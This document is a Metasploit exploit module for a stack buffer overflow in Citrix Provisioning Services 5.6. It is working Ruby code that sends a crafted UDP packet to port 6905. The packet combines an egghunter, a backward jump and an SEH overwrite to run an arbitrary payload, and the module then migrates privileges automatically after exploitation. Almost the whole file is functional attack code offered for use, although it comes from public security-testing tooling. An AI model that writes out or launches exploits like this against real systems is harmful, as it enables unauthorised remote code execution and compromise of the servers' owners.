##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
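class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::Udp
  include Msf::Exploit::Remote::Egghunter

  # Number of bytes reserved for the egghunter plus its padding.  The short
  # jump emitted in #exploit ("\xEB\xBE", i.e. jmp -66) is hard-coded against
  # this value: 64 bytes of hunter+padding plus the 2-byte jmp itself.
  HUNTER_WINDOW = 64

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Citrix Provisioning Services 5.6 streamprocess.exe Buffer Overflow',
        'Description' => %q{
          This module exploits a stack buffer overflow in Citrix Provisioning Services 5.6.
          By sending a specially crafted packet to the Provisioning Services server, a fixed
          length buffer on the stack can be overflowed and arbitrary code can be executed.
        },
        'Author' => 'mog',
        'License' => MSF_LICENSE,
        'References' => [
          [ 'OSVDB', '70597'],
          [ 'ZDI', '11-023' ],
          [ 'URL', 'http://web.archive.org/web/20110123164820/http://secunia.com:80/advisories/42954/' ],
          [ 'URL', 'http://support.citrix.com/article/CTX127149' ],
        ],
        'DefaultOptions' => {
          # best at delaying/preventing target crashing post-exploit
          'EXITFUNC' => 'process',
          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
        },
        'Payload' => {
          'BadChars' => "\x00", # Only "\x00\x00" breaks the overflow, but this is safer
        },
        'Platform' => 'win',
        'Targets' => [
          # pop/pop/ret in streamprocess.exe.  Packed little-endian this address
          # ends in a single 0x00, which the BadChars note above says the copy
          # tolerates (only a double null terminates it).
          # Service runs and automatically shuts down in Win 7
          [ 'Windows XP SP3 / Windows Server 2003 SP2 / Windows Vista', { 'Ret' => 0x00423d32 } ],
        ],
        'Privileged' => true,
        'DefaultTarget' => 0,
        'DisclosureDate' => '2011-01-20',
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options([Opt::RPORT(6905)])
  end

  # Builds the overflow datagram, sends it over UDP and hands the socket to
  # the payload handler.
  #
  # Packet layout (as described by the original author's inline comments;
  # the exact offset of the SEH record was not re-verified here):
  #   message type (4) | 30 random | length field (4) | 400 random |
  #   egghunter padded to HUNTER_WINDOW | jmp -66 | 2 random |
  #   SE handler (target.ret) | 50 random | egg (tag + payload)
  #
  # Fails via fail_with (Failure::BadConfig) when the generated egghunter
  # does not fit inside the fixed jump window, since the backwards jump would
  # otherwise land in random padding and the exploit would fail silently.
  def exploit
    eggoptions = {
      :checksum => true,
      :eggtag => 'W00t',
    }
    hunter, egg = generate_egghunter(payload.encoded, payload_badchars, eggoptions)

    # The jmp below is a fixed -66; anything longer than the window would
    # also make the padding length negative.  Refuse to build a broken packet.
    if hunter.length > HUNTER_WINDOW
      fail_with(Failure::BadConfig, "Egghunter is #{hunter.length} bytes; it must fit in #{HUNTER_WINDOW}")
    end

    sploit = "\x10\x00\x02\x40" # message type
    sploit << rand_text_alpha_upper(30)
    sploit << "\x00\x01\x00\x00" # length field
    sploit << rand_text_alpha_upper(400)
    sploit << hunter
    sploit << rand_text_alpha_upper(HUNTER_WINDOW - hunter.length)

    sploit << "\xEB\xBE" # Jump back 66 bytes to hunter because there's
    sploit << rand_text_alpha_upper(2) # only 24 bytes of cyclic copy after ret
    sploit << [target.ret].pack('V') # SE handler (pop/pop/ret)

    sploit << rand_text_alpha_upper(50) # Need >= 24 bytes to keep the tag out of the stack
    sploit << egg # Payload has a whole page to itself

    print_status("Trying target #{target.name}...")

    connect_udp
    begin
      udp_sock.put(sploit)
      print_status("Exploit sent, wait for egghunter.")
      # Give the hunter a head start before polling the handler; the original
      # author measured roughly 8 seconds for it to find the egg in tests.
      select(nil, nil, nil, 4)

      handler(udp_sock)
    ensure
      # Always release the UDP socket, even if the handler raises.
      disconnect_udp
    end
  end
end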